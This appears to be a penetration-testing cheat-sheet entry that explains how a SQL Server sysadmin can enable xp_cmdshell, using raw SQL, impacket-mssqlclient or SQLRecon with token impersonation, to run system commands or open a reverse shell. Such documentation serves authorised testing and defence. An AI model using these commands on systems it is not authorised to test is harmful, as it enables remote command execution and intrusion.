Leverage xp_cmdshell Procedure
Table of contents
Vulnerability
If you are authenticated as database administrator, you are able to use xp_cmdshell
to execute system command.
Prerequisites
- Having sysadmin privileges on the Microsoft SQL instance.
Exploit
To do it manually, enter following SQL requests.
-- This turns on advanced options and is needed to configure xp_cmdshell
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
-- This enables xp_cmdshell
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
If you are connected with impacket-mssqlclient
, you can leverage builtin commands provided by the tool.
# This enables xp_cmdshell, then reconfigure to apply changes.
enable_xp_cmdshell
RECONFIGURE
# Now you can leverage this feature to enumerate host or pop a reverse shell.
xp_cmdshell $command
Using [SQLRecon], you can use followings.
# Add `/i:$domain\$username` to impersonate a user to perform this operation.
./SQLRecon.exe /a:wintoken /h:$hostname,$port /m:ienablexp
./SQLRecon.exe /a:wintoken /h:$hostname,$port /m:ixpcmd /c:$command